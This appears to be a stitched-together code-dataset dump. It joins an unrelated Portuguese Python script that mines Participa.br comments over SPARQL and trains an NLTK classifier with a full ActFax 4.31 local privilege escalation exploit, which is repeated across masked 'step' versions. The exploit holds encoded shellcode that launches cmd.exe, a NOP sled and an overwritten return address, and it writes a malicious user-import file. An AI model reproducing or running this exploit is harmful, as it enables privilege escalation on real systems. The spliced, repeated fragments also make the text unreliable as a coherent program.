""" q2="SELECT ?nome WHERE {?s rdf:type ops:Participant . ?s foaf:name ?nome .}" NOW=time.time() sparql3 = SPARQLWrapper("http://localhost:82/participabr/query") #sparql3 = SPARQLWrapper("http://200.144.255.210:8082/participabr/query") sparql3.setQuery(PREFIX+q2) sparql3.setReturnFormat(JSON) results3 = sparql3.query().convert() print("%.2f segundos para puxar todos os nomes dos participantes do Participa.br"%(time.time()-NOW,)) for i in results3["results"]["bindings"][-10:]: print(u"participante: " +i["nome"]["value"]) NOW=time.time() q="SELECT ?comentario ?titulo ?texto WHERE {?comentario dc:type tsioc:Comment. OPTIONAL {?comentario dc:title ?titulo . } OPTIONAL {?comentario schema:text ?texto .}}" sparql3.setQuery(PREFIX+q) sparql3.setReturnFormat(JSON) results4 = sparql3.query().convert() print("%.2f segundos para puxar todos os comentários do Participa.br"%(time.time()-NOW,)) NOW=time.time() print("dados lidos, processando") import string, nltk as k # histograma com as palavras palavras=string.join([i["texto"]["value"].lower() for i in results4["results"]["bindings"]]) exclude = set(string.punctuation) palavras = ''.join(ch for ch in palavras if ch not in exclude) palavras_=palavras.split() #fdist=k.FreqDist(palavras_) print("feita primeira freq dist em %.2f"%(time.time()-NOW,)) NOW=time.time() stopwords = set(k.corpus.stopwords.words('portuguese')) palavras__=[pp for pp in palavras_ if pp not in stopwords] fdist_=k.FreqDist(palavras__) print("feita segunda freq dist (retiradas stopwords) em %.2f"%(time.time()-NOW,)) #NOW=time.time() #stemmer = k.stem.RSLPStemmer() #palavras___=[stemmer.stem(pp) for pp in palavras__] #fdist__=k.FreqDist(palavras___) #print("feita terceira freq dist (radicalizada) em %.2f"%(time.time()-NOW,)) ################## # bebe comentarios do endpoint sparql. # guarda 10 e os classifica na mão # faz histograma de todas as palavras # escolhe as mais frequentes ou com offset # ou as menos frequentes # faz feture vector com elas. # escolhendo as 200 palavras mais frequentes palavras_escolhidas=fdist_.keys()[:200] # outras features que podemos escolher é: # *) número de palavras terminadas em a, o, e ou s # *) tamanho médio das palavras utilizadas # *) uso das stopwords # é necessário um conjunto maior de classificações na mão # para julgar qual parte do histograma # é melhor de ser considerada. ######### def document_features(documento): features={} for palavra in palavras_escolhidas: features["contains(%s)"%(palavra,)]=(palavra in documento) return features # fazendo com classes dummy msgs= [(rr["texto"]["value"],"pos") for rr in results4["results"]["bindings"][:1000]] msgs2=[(rr["texto"]["value"],"neg") for rr in results4["results"]["bindings"][1000:2000]] msgs_=msgs+msgs2 random.shuffle(msgs_) feature_sets=[(document_features(msg[0]),msg[1]) for msg in msgs_] train_set, test_set = feature_sets[1000:], feature_sets[:1000] classifier = k.NaiveBayesClassifier.train(train_set) ######## # As mais frequentes podem ser úteis já que os comentários # são pequenos e queremos que o vetor de atributos tenha informação # As menos frequentes são as palavras mais incomuns, informativas # para detecção de nichos do autor # As de incidência intermediária são consideradas as mais representativas # do assunto
normal
{ "blob_id": "c5b50420788ddde7483a46c66aca3922ddb47952", "index": 6199, "step-1": "<mask token>\n\n\ndef document_features(documento):\n features = {}\n for palavra in palavras_escolhidas:\n features['contains(%s)' % (palavra,)] = palavra in documento\n return features\n\n\n<mask token>\n", "step-2": "<mask token>\nsparql.setQuery(\n \"\"\"\n PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\n SELECT ?label\n WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label }\n\"\"\"\n )\nsparql.setReturnFormat(JSON)\n<mask token>\nprint('%.2f segundos para consultar a dbpedia' % (time.time() - NOW,))\nfor result in results['results']['bindings']:\n print(result['label']['value'] + ', ' + result['label']['xml:lang'])\n<mask token>\nsparql3.setQuery(PREFIX + q2)\nsparql3.setReturnFormat(JSON)\n<mask token>\nprint(\n '%.2f segundos para puxar todos os nomes dos participantes do Participa.br'\n % (time.time() - NOW,))\nfor i in results3['results']['bindings'][-10:]:\n print(u'participante: ' + i['nome']['value'])\n<mask token>\nsparql3.setQuery(PREFIX + q)\nsparql3.setReturnFormat(JSON)\n<mask token>\nprint('%.2f segundos para puxar todos os comentários do Participa.br' % (\n time.time() - NOW,))\n<mask token>\nprint('dados lidos, processando')\n<mask token>\nprint('feita primeira freq dist em %.2f' % (time.time() - NOW,))\n<mask token>\nprint('feita segunda freq dist (retiradas stopwords) em %.2f' % (time.time(\n ) - NOW,))\n<mask token>\n\n\ndef document_features(documento):\n features = {}\n for palavra in palavras_escolhidas:\n features['contains(%s)' % (palavra,)] = palavra in documento\n return features\n\n\n<mask token>\nrandom.shuffle(msgs_)\n<mask token>\n", "step-3": "<mask token>\nNOW = time.time()\nsparql = SPARQLWrapper('http://dbpedia.org/sparql')\nsparql.setQuery(\n \"\"\"\n PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\n SELECT ?label\n WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label }\n\"\"\"\n )\nsparql.setReturnFormat(JSON)\nresults = sparql.query().convert()\nprint('%.2f segundos para consultar a dbpedia' % (time.time() - NOW,))\nfor result in results['results']['bindings']:\n print(result['label']['value'] + ', ' + result['label']['xml:lang'])\nPREFIX = \"\"\"PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\nPREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\nPREFIX ops: <http://purl.org/socialparticipation/ops#>\nPREFIX opa: <http://purl.org/socialparticipation/opa#>\nPREFIX foaf: <http://xmlns.com/foaf/0.1/>\nPREFIX dc: <http://purl.org/dc/terms/>\nPREFIX tsioc: <http://rdfs.org/sioc/types#>\nPREFIX schema: <http://schema.org/>\n\"\"\"\nq2 = 'SELECT ?nome WHERE {?s rdf:type ops:Participant . ?s foaf:name ?nome .}'\nNOW = time.time()\nsparql3 = SPARQLWrapper('http://localhost:82/participabr/query')\nsparql3.setQuery(PREFIX + q2)\nsparql3.setReturnFormat(JSON)\nresults3 = sparql3.query().convert()\nprint(\n '%.2f segundos para puxar todos os nomes dos participantes do Participa.br'\n % (time.time() - NOW,))\nfor i in results3['results']['bindings'][-10:]:\n print(u'participante: ' + i['nome']['value'])\nNOW = time.time()\nq = (\n 'SELECT ?comentario ?titulo ?texto WHERE {?comentario dc:type tsioc:Comment. OPTIONAL {?comentario dc:title ?titulo . } OPTIONAL {?comentario schema:text ?texto .}}'\n )\nsparql3.setQuery(PREFIX + q)\nsparql3.setReturnFormat(JSON)\nresults4 = sparql3.query().convert()\nprint('%.2f segundos para puxar todos os comentários do Participa.br' % (\n time.time() - NOW,))\nNOW = time.time()\nprint('dados lidos, processando')\n<mask token>\npalavras = string.join([i['texto']['value'].lower() for i in results4[\n 'results']['bindings']])\nexclude = set(string.punctuation)\npalavras = ''.join(ch for ch in palavras if ch not in exclude)\npalavras_ = palavras.split()\nprint('feita primeira freq dist em %.2f' % (time.time() - NOW,))\nNOW = time.time()\nstopwords = set(k.corpus.stopwords.words('portuguese'))\npalavras__ = [pp for pp in palavras_ if pp not in stopwords]\nfdist_ = k.FreqDist(palavras__)\nprint('feita segunda freq dist (retiradas stopwords) em %.2f' % (time.time(\n ) - NOW,))\npalavras_escolhidas = fdist_.keys()[:200]\n\n\ndef document_features(documento):\n features = {}\n for palavra in palavras_escolhidas:\n features['contains(%s)' % (palavra,)] = palavra in documento\n return features\n\n\nmsgs = [(rr['texto']['value'], 'pos') for rr in results4['results'][\n 'bindings'][:1000]]\nmsgs2 = [(rr['texto']['value'], 'neg') for rr in results4['results'][\n 'bindings'][1000:2000]]\nmsgs_ = msgs + msgs2\nrandom.shuffle(msgs_)\nfeature_sets = [(document_features(msg[0]), msg[1]) for msg in msgs_]\ntrain_set, test_set = feature_sets[1000:], feature_sets[:1000]\nclassifier = k.NaiveBayesClassifier.train(train_set)\n", "step-4": "from SPARQLWrapper import SPARQLWrapper, SPARQLWrapper2, JSON\nimport time, random\nNOW = time.time()\nsparql = SPARQLWrapper('http://dbpedia.org/sparql')\nsparql.setQuery(\n \"\"\"\n PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\n SELECT ?label\n WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label }\n\"\"\"\n )\nsparql.setReturnFormat(JSON)\nresults = sparql.query().convert()\nprint('%.2f segundos para consultar a dbpedia' % (time.time() - NOW,))\nfor result in results['results']['bindings']:\n print(result['label']['value'] + ', ' + result['label']['xml:lang'])\nPREFIX = \"\"\"PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\nPREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\nPREFIX ops: <http://purl.org/socialparticipation/ops#>\nPREFIX opa: <http://purl.org/socialparticipation/opa#>\nPREFIX foaf: <http://xmlns.com/foaf/0.1/>\nPREFIX dc: <http://purl.org/dc/terms/>\nPREFIX tsioc: <http://rdfs.org/sioc/types#>\nPREFIX schema: <http://schema.org/>\n\"\"\"\nq2 = 'SELECT ?nome WHERE {?s rdf:type ops:Participant . ?s foaf:name ?nome .}'\nNOW = time.time()\nsparql3 = SPARQLWrapper('http://localhost:82/participabr/query')\nsparql3.setQuery(PREFIX + q2)\nsparql3.setReturnFormat(JSON)\nresults3 = sparql3.query().convert()\nprint(\n '%.2f segundos para puxar todos os nomes dos participantes do Participa.br'\n % (time.time() - NOW,))\nfor i in results3['results']['bindings'][-10:]:\n print(u'participante: ' + i['nome']['value'])\nNOW = time.time()\nq = (\n 'SELECT ?comentario ?titulo ?texto WHERE {?comentario dc:type tsioc:Comment. OPTIONAL {?comentario dc:title ?titulo . } OPTIONAL {?comentario schema:text ?texto .}}'\n )\nsparql3.setQuery(PREFIX + q)\nsparql3.setReturnFormat(JSON)\nresults4 = sparql3.query().convert()\nprint('%.2f segundos para puxar todos os comentários do Participa.br' % (\n time.time() - NOW,))\nNOW = time.time()\nprint('dados lidos, processando')\nimport string, nltk as k\npalavras = string.join([i['texto']['value'].lower() for i in results4[\n 'results']['bindings']])\nexclude = set(string.punctuation)\npalavras = ''.join(ch for ch in palavras if ch not in exclude)\npalavras_ = palavras.split()\nprint('feita primeira freq dist em %.2f' % (time.time() - NOW,))\nNOW = time.time()\nstopwords = set(k.corpus.stopwords.words('portuguese'))\npalavras__ = [pp for pp in palavras_ if pp not in stopwords]\nfdist_ = k.FreqDist(palavras__)\nprint('feita segunda freq dist (retiradas stopwords) em %.2f' % (time.time(\n ) - NOW,))\npalavras_escolhidas = fdist_.keys()[:200]\n\n\ndef document_features(documento):\n features = {}\n for palavra in palavras_escolhidas:\n features['contains(%s)' % (palavra,)] = palavra in documento\n return features\n\n\nmsgs = [(rr['texto']['value'], 'pos') for rr in results4['results'][\n 'bindings'][:1000]]\nmsgs2 = [(rr['texto']['value'], 'neg') for rr in results4['results'][\n 'bindings'][1000:2000]]\nmsgs_ = msgs + msgs2\nrandom.shuffle(msgs_)\nfeature_sets = [(document_features(msg[0]), msg[1]) for msg in msgs_]\ntrain_set, test_set = feature_sets[1000:], feature_sets[:1000]\nclassifier = k.NaiveBayesClassifier.train(train_set)\n", "step-5": "#-*- coding: utf-8 -*-\nfrom SPARQLWrapper import SPARQLWrapper, SPARQLWrapper2, JSON\nimport time, random\n\n# testes\nNOW=time.time()\nsparql = SPARQLWrapper(\"http://dbpedia.org/sparql\")\nsparql.setQuery(\"\"\"\n PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\n SELECT ?label\n WHERE { <http://dbpedia.org/resource/Love> rdfs:label ?label }\n\"\"\")\nsparql.setReturnFormat(JSON)\nresults = sparql.query().convert()\nprint(\"%.2f segundos para consultar a dbpedia\"%(time.time()-NOW,))\n\nfor result in results[\"results\"][\"bindings\"]:\n print(result[\"label\"][\"value\"]+\", \"+result[\"label\"][\"xml:lang\"])\n\nPREFIX=\"\"\"PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\nPREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\nPREFIX ops: <http://purl.org/socialparticipation/ops#>\nPREFIX opa: <http://purl.org/socialparticipation/opa#>\nPREFIX foaf: <http://xmlns.com/foaf/0.1/>\nPREFIX dc: <http://purl.org/dc/terms/>\nPREFIX tsioc: <http://rdfs.org/sioc/types#>\nPREFIX schema: <http://schema.org/>\n\"\"\"\n\nq2=\"SELECT ?nome WHERE {?s rdf:type ops:Participant . ?s foaf:name ?nome .}\"\nNOW=time.time()\nsparql3 = SPARQLWrapper(\"http://localhost:82/participabr/query\")\n#sparql3 = SPARQLWrapper(\"http://200.144.255.210:8082/participabr/query\")\nsparql3.setQuery(PREFIX+q2)\nsparql3.setReturnFormat(JSON)\nresults3 = sparql3.query().convert()\nprint(\"%.2f segundos para puxar todos os nomes dos participantes do Participa.br\"%(time.time()-NOW,))\n\nfor i in results3[\"results\"][\"bindings\"][-10:]: print(u\"participante: \" +i[\"nome\"][\"value\"])\n\nNOW=time.time()\nq=\"SELECT ?comentario ?titulo ?texto WHERE {?comentario dc:type tsioc:Comment. OPTIONAL {?comentario dc:title ?titulo . } OPTIONAL {?comentario schema:text ?texto .}}\"\nsparql3.setQuery(PREFIX+q)\nsparql3.setReturnFormat(JSON)\nresults4 = sparql3.query().convert()\nprint(\"%.2f segundos para puxar todos os comentários do Participa.br\"%(time.time()-NOW,))\n\nNOW=time.time()\nprint(\"dados lidos, processando\")\nimport string, nltk as k\n# histograma com as palavras\npalavras=string.join([i[\"texto\"][\"value\"].lower() for i in results4[\"results\"][\"bindings\"]])\nexclude = set(string.punctuation)\npalavras = ''.join(ch for ch in palavras if ch not in exclude)\npalavras_=palavras.split()\n#fdist=k.FreqDist(palavras_)\nprint(\"feita primeira freq dist em %.2f\"%(time.time()-NOW,))\n\nNOW=time.time()\nstopwords = set(k.corpus.stopwords.words('portuguese'))\npalavras__=[pp for pp in palavras_ if pp not in stopwords]\nfdist_=k.FreqDist(palavras__)\nprint(\"feita segunda freq dist (retiradas stopwords) em %.2f\"%(time.time()-NOW,))\n\n#NOW=time.time()\n#stemmer = k.stem.RSLPStemmer()\n#palavras___=[stemmer.stem(pp) for pp in palavras__]\n#fdist__=k.FreqDist(palavras___)\n#print(\"feita terceira freq dist (radicalizada) em %.2f\"%(time.time()-NOW,))\n\n##################\n# bebe comentarios do endpoint sparql.\n# guarda 10 e os classifica na mão\n\n# faz histograma de todas as palavras\n# escolhe as mais frequentes ou com offset\n# ou as menos frequentes\n# faz feture vector com elas.\n# escolhendo as 200 palavras mais frequentes\npalavras_escolhidas=fdist_.keys()[:200]\n# outras features que podemos escolher é:\n# *) número de palavras terminadas em a, o, e ou s\n# *) tamanho médio das palavras utilizadas\n# *) uso das stopwords\n\n# é necessário um conjunto maior de classificações na mão\n# para julgar qual parte do histograma\n# é melhor de ser considerada.\n\n#########\ndef document_features(documento):\n features={}\n for palavra in palavras_escolhidas:\n features[\"contains(%s)\"%(palavra,)]=(palavra in documento)\n return features\n# fazendo com classes dummy\nmsgs= [(rr[\"texto\"][\"value\"],\"pos\") for rr in results4[\"results\"][\"bindings\"][:1000]]\nmsgs2=[(rr[\"texto\"][\"value\"],\"neg\") for rr in results4[\"results\"][\"bindings\"][1000:2000]]\nmsgs_=msgs+msgs2\nrandom.shuffle(msgs_)\nfeature_sets=[(document_features(msg[0]),msg[1]) for msg in msgs_]\ntrain_set, test_set = feature_sets[1000:], feature_sets[:1000]\nclassifier = k.NaiveBayesClassifier.train(train_set)\n\n########\n# As mais frequentes podem ser úteis já que os comentários\n# são pequenos e queremos que o vetor de atributos tenha informação\n\n# As menos frequentes são as palavras mais incomuns, informativas\n# para detecção de nichos do autor\n\n# As de incidência intermediária são consideradas as mais representativas\n# do assunto\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
#!/usr/bin/python #Title: ActFax 4.31 Local Privilege Escalation Exploit #Author: Craig Freyman (@cd1zz) #Discovered: July 10, 2012 #Vendor Notified: June 12, 2012 #Description: http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html #msfpayload windows/exec CMD=cmd.exe R | msfencode -e x86/alpha_upper -f c #[*] x86/alpha_upper succeeded with size 466 (iteration=1) sc = ( "\x89\xe5\xdb\xce\xd9\x75\xf4\x58\x50\x59\x49\x49\x49\x49" "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a" "\x48\x4d\x59\x45\x50\x35\x50\x53\x30\x43\x50\x4d\x59\x4a" "\x45\x56\x51\x48\x52\x55\x34\x4c\x4b\x36\x32\x50\x30\x4c" "\x4b\x36\x32\x44\x4c\x4c\x4b\x30\x52\x52\x34\x4c\x4b\x34" "\x32\x56\x48\x34\x4f\x38\x37\x51\x5a\x37\x56\x46\x51\x4b" "\x4f\x46\x51\x39\x50\x4e\x4c\x47\x4c\x35\x31\x43\x4c\x43" "\x32\x36\x4c\x31\x30\x49\x51\x48\x4f\x34\x4d\x55\x51\x58" "\x47\x4a\x42\x4c\x30\x30\x52\x50\x57\x4c\x4b\x50\x52\x52" "\x30\x4c\x4b\x37\x32\x47\x4c\x55\x51\x58\x50\x4c\x4b\x47" "\x30\x33\x48\x4b\x35\x39\x50\x34\x34\x50\x4a\x33\x31\x4e" "\x30\x30\x50\x4c\x4b\x57\x38\x52\x38\x4c\x4b\x36\x38\x51" "\x30\x33\x31\x4e\x33\x4b\x53\x57\x4c\x57\x39\x4c\x4b\x56" "\x54\x4c\x4b\x53\x31\x48\x56\x36\x51\x4b\x4f\x46\x51\x4f" "\x30\x4e\x4c\x49\x51\x58\x4f\x54\x4d\x55\x51\x39\x57\x50" "\x38\x4b\x50\x32\x55\x5a\x54\x53\x33\x43\x4d\x4b\x48\x47" "\x4b\x33\x4d\x46\x44\x53\x45\x5a\x42\x36\x38\x4c\x4b\x30" "\x58\x47\x54\x45\x51\x49\x43\x45\x36\x4c\x4b\x44\x4c\x30" "\x4b\x4c\x4b\x36\x38\x55\x4c\x53\x31\x59\x43\x4c\x4b\x54" "\x44\x4c\x4b\x55\x51\x48\x50\x4c\x49\x31\x54\x47\x54\x36" "\x44\x51\x4b\x31\x4b\x55\x31\x36\x39\x31\x4a\x36\x31\x4b" "\x4f\x4d\x30\x51\x48\x51\x4f\x50\x5a\x4c\x4b\x55\x42\x5a" "\x4b\x4d\x56\x31\x4d\x52\x4a\x45\x51\x4c\x4d\x4d\x55\x4f" "\x49\x45\x50\x53\x30\x53\x30\x46\x30\x42\x48\x36\x51\x4c" "\x4b\x52\x4f\x4d\x57\x4b\x4f\x39\x45\x4f\x4b\x4a\x50\x4e" "\x55\x39\x32\x31\x46\x55\x38\x59\x36\x4d\x45\x4f\x4d\x4d" "\x4d\x4b\x4f\x58\x55\x57\x4c\x35\x56\x53\x4c\x44\x4a\x4d" "\x50\x4b\x4b\x4d\x30\x52\x55\x55\x55\x4f\x4b\x37\x37\x35" "\x43\x52\x52\x32\x4f\x43\x5a\x43\x30\x56\x33\x4b\x4f\x4e" "\x35\x32\x43\x32\x4d\x45\x34\x46\x4e\x35\x35\x43\x48\x45" "\x35\x33\x30\x41\x41") frontpad = "\x90" * 10 eip = "\x22\x1b\x40\x00" #00401B22 RETN actfax.exe backpad = "\x90" * 6000 buff = frontpad + sc + "\x90" * (502 - len(sc)) + eip + backpad f = open("pwnag3.exp", "w") f.write( "User Name\tEntire User Name\tPassword\tAlias-Names\tGroup\tDirect Dialing\tCost Account\tPermissions\tComments\tUser-Defined\t" "Predefined Settings\tName 1\tName 2\tName 3\tName 4\tName 5\tDepartment\tAttention of\tPhone 1\tPhone 2\tFax Number\tE-Mail\t" "Coverpage Non-Windows\tOverlay Non-Windows\tCoverpage Windows\tOverlay Windows\tUser-Defined\tPrinter Settings\tAutomatic Printing Outgoing\t" "Printer Name Outgoing\tReport Outgoing\tAutomatic Printing Incoming\tPrinter Name Incoming\tReport Incoming\tNotification Outgoing\t" "Email Outgoing\tNotification Incoming\tEmail Incoming\tAttach Original Message\tUser-Defined Archive Settings\tExport Outgoing\t" "Export Incoming\tExport-Path\tMark as Read\x0d\x0a"+buff+"\x0d\x0a") f.close()
normal
{ "blob_id": "1b7048ef17b3512b9944ce7e197db27f4fd1aed0", "index": 1687, "step-1": "<mask token>\n", "step-2": "<mask token>\nf.write(\n 'User Name\\tEntire User Name\\tPassword\\tAlias-Names\\tGroup\\tDirect Dialing\\tCost Account\\tPermissions\\tComments\\tUser-Defined\\tPredefined Settings\\tName 1\\tName 2\\tName 3\\tName 4\\tName 5\\tDepartment\\tAttention of\\tPhone 1\\tPhone 2\\tFax Number\\tE-Mail\\tCoverpage Non-Windows\\tOverlay Non-Windows\\tCoverpage Windows\\tOverlay Windows\\tUser-Defined\\tPrinter Settings\\tAutomatic Printing Outgoing\\tPrinter Name Outgoing\\tReport Outgoing\\tAutomatic Printing Incoming\\tPrinter Name Incoming\\tReport Incoming\\tNotification Outgoing\\tEmail Outgoing\\tNotification Incoming\\tEmail Incoming\\tAttach Original Message\\tUser-Defined Archive Settings\\tExport Outgoing\\tExport Incoming\\tExport-Path\\tMark as Read\\r\\n'\n + buff + '\\r\\n')\nf.close()\n", "step-3": "sc = (\n '\\x89åÛÎÙuôXPYIIIICCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLZHMYEP5PS0CPMYJEVQHRU4LK62P0LK62DLLK0RR4LK42VH4O87QZ7VFQKOFQ9PNLGL51CLC26L10IQHO4MUQXGJBL00RPWLKPRR0LK72GLUQXPLKG03HK59P44PJ31N00PLKW8R8LK68Q031N3KSWLW9LKVTLKS1HV6QKOFQO0NLIQXOTMUQ9WP8KP2UZTS3CMKHGK3MFDSEZB68LK0XGTEQICE6LKDL0KLK68ULS1YCLKTDLKUQHPLI1TGT6DQK1KU1691J61KOM0QHQOPZLKUBZKMV1MRJEQLMMUOIEPS0S0F0BH6QLKROMWKO9EOKJPNU921FU8Y6MEOMMMKOXUWL5VSLDJMPKKM0RUUUOK775CRR2OCZC0V3KON52C2ME4FN55CHE530AA'\n )\nfrontpad = '\\x90' * 10\neip = '\"\\x1b@\\x00'\nbackpad = '\\x90' * 6000\nbuff = frontpad + sc + '\\x90' * (502 - len(sc)) + eip + backpad\nf = open('pwnag3.exp', 'w')\nf.write(\n 'User Name\\tEntire User Name\\tPassword\\tAlias-Names\\tGroup\\tDirect Dialing\\tCost Account\\tPermissions\\tComments\\tUser-Defined\\tPredefined Settings\\tName 1\\tName 2\\tName 3\\tName 4\\tName 5\\tDepartment\\tAttention of\\tPhone 1\\tPhone 2\\tFax Number\\tE-Mail\\tCoverpage Non-Windows\\tOverlay Non-Windows\\tCoverpage Windows\\tOverlay Windows\\tUser-Defined\\tPrinter Settings\\tAutomatic Printing Outgoing\\tPrinter Name Outgoing\\tReport Outgoing\\tAutomatic Printing Incoming\\tPrinter Name Incoming\\tReport Incoming\\tNotification Outgoing\\tEmail Outgoing\\tNotification Incoming\\tEmail Incoming\\tAttach Original Message\\tUser-Defined Archive Settings\\tExport Outgoing\\tExport Incoming\\tExport-Path\\tMark as Read\\r\\n'\n + buff + '\\r\\n')\nf.close()\n", "step-4": "#!/usr/bin/python\r\n#Title: ActFax 4.31 Local Privilege Escalation Exploit\r\n#Author: Craig Freyman (@cd1zz)\r\n#Discovered: July 10, 2012\r\n#Vendor Notified: June 12, 2012\r\n#Description: http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html\r\n\r\n#msfpayload windows/exec CMD=cmd.exe R | msfencode -e x86/alpha_upper -f c\r\n#[*] x86/alpha_upper succeeded with size 466 (iteration=1)\r\nsc = (\r\n\"\\x89\\xe5\\xdb\\xce\\xd9\\x75\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49\"\r\n\"\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56\"\r\n\"\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\"\r\n\"\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\"\r\n\"\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x5a\"\r\n\"\\x48\\x4d\\x59\\x45\\x50\\x35\\x50\\x53\\x30\\x43\\x50\\x4d\\x59\\x4a\"\r\n\"\\x45\\x56\\x51\\x48\\x52\\x55\\x34\\x4c\\x4b\\x36\\x32\\x50\\x30\\x4c\"\r\n\"\\x4b\\x36\\x32\\x44\\x4c\\x4c\\x4b\\x30\\x52\\x52\\x34\\x4c\\x4b\\x34\"\r\n\"\\x32\\x56\\x48\\x34\\x4f\\x38\\x37\\x51\\x5a\\x37\\x56\\x46\\x51\\x4b\"\r\n\"\\x4f\\x46\\x51\\x39\\x50\\x4e\\x4c\\x47\\x4c\\x35\\x31\\x43\\x4c\\x43\"\r\n\"\\x32\\x36\\x4c\\x31\\x30\\x49\\x51\\x48\\x4f\\x34\\x4d\\x55\\x51\\x58\"\r\n\"\\x47\\x4a\\x42\\x4c\\x30\\x30\\x52\\x50\\x57\\x4c\\x4b\\x50\\x52\\x52\"\r\n\"\\x30\\x4c\\x4b\\x37\\x32\\x47\\x4c\\x55\\x51\\x58\\x50\\x4c\\x4b\\x47\"\r\n\"\\x30\\x33\\x48\\x4b\\x35\\x39\\x50\\x34\\x34\\x50\\x4a\\x33\\x31\\x4e\"\r\n\"\\x30\\x30\\x50\\x4c\\x4b\\x57\\x38\\x52\\x38\\x4c\\x4b\\x36\\x38\\x51\"\r\n\"\\x30\\x33\\x31\\x4e\\x33\\x4b\\x53\\x57\\x4c\\x57\\x39\\x4c\\x4b\\x56\"\r\n\"\\x54\\x4c\\x4b\\x53\\x31\\x48\\x56\\x36\\x51\\x4b\\x4f\\x46\\x51\\x4f\"\r\n\"\\x30\\x4e\\x4c\\x49\\x51\\x58\\x4f\\x54\\x4d\\x55\\x51\\x39\\x57\\x50\"\r\n\"\\x38\\x4b\\x50\\x32\\x55\\x5a\\x54\\x53\\x33\\x43\\x4d\\x4b\\x48\\x47\"\r\n\"\\x4b\\x33\\x4d\\x46\\x44\\x53\\x45\\x5a\\x42\\x36\\x38\\x4c\\x4b\\x30\"\r\n\"\\x58\\x47\\x54\\x45\\x51\\x49\\x43\\x45\\x36\\x4c\\x4b\\x44\\x4c\\x30\"\r\n\"\\x4b\\x4c\\x4b\\x36\\x38\\x55\\x4c\\x53\\x31\\x59\\x43\\x4c\\x4b\\x54\"\r\n\"\\x44\\x4c\\x4b\\x55\\x51\\x48\\x50\\x4c\\x49\\x31\\x54\\x47\\x54\\x36\"\r\n\"\\x44\\x51\\x4b\\x31\\x4b\\x55\\x31\\x36\\x39\\x31\\x4a\\x36\\x31\\x4b\"\r\n\"\\x4f\\x4d\\x30\\x51\\x48\\x51\\x4f\\x50\\x5a\\x4c\\x4b\\x55\\x42\\x5a\"\r\n\"\\x4b\\x4d\\x56\\x31\\x4d\\x52\\x4a\\x45\\x51\\x4c\\x4d\\x4d\\x55\\x4f\"\r\n\"\\x49\\x45\\x50\\x53\\x30\\x53\\x30\\x46\\x30\\x42\\x48\\x36\\x51\\x4c\"\r\n\"\\x4b\\x52\\x4f\\x4d\\x57\\x4b\\x4f\\x39\\x45\\x4f\\x4b\\x4a\\x50\\x4e\"\r\n\"\\x55\\x39\\x32\\x31\\x46\\x55\\x38\\x59\\x36\\x4d\\x45\\x4f\\x4d\\x4d\"\r\n\"\\x4d\\x4b\\x4f\\x58\\x55\\x57\\x4c\\x35\\x56\\x53\\x4c\\x44\\x4a\\x4d\"\r\n\"\\x50\\x4b\\x4b\\x4d\\x30\\x52\\x55\\x55\\x55\\x4f\\x4b\\x37\\x37\\x35\"\r\n\"\\x43\\x52\\x52\\x32\\x4f\\x43\\x5a\\x43\\x30\\x56\\x33\\x4b\\x4f\\x4e\"\r\n\"\\x35\\x32\\x43\\x32\\x4d\\x45\\x34\\x46\\x4e\\x35\\x35\\x43\\x48\\x45\"\r\n\"\\x35\\x33\\x30\\x41\\x41\")\r\n\r\nfrontpad = \"\\x90\" * 10 \r\neip = \"\\x22\\x1b\\x40\\x00\"\t#00401B22 RETN actfax.exe\r\nbackpad = \"\\x90\" * 6000\r\nbuff = frontpad + sc + \"\\x90\" * (502 - len(sc)) + eip + backpad\r\n\r\nf = open(\"pwnag3.exp\", \"w\")\r\nf.write(\r\n\"User Name\\tEntire User Name\\tPassword\\tAlias-Names\\tGroup\\tDirect Dialing\\tCost Account\\tPermissions\\tComments\\tUser-Defined\\t\"\r\n\"Predefined Settings\\tName 1\\tName 2\\tName 3\\tName 4\\tName 5\\tDepartment\\tAttention of\\tPhone 1\\tPhone 2\\tFax Number\\tE-Mail\\t\"\r\n\"Coverpage Non-Windows\\tOverlay Non-Windows\\tCoverpage Windows\\tOverlay Windows\\tUser-Defined\\tPrinter Settings\\tAutomatic Printing Outgoing\\t\"\r\n\"Printer Name Outgoing\\tReport Outgoing\\tAutomatic Printing Incoming\\tPrinter Name Incoming\\tReport Incoming\\tNotification Outgoing\\t\"\r\n\"Email Outgoing\\tNotification Incoming\\tEmail Incoming\\tAttach Original Message\\tUser-Defined Archive Settings\\tExport Outgoing\\t\"\r\n\"Export Incoming\\tExport-Path\\tMark as Read\\x0d\\x0a\"+buff+\"\\x0d\\x0a\")\r\nf.close()\r\n\r\n\r\n\r\n\r\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
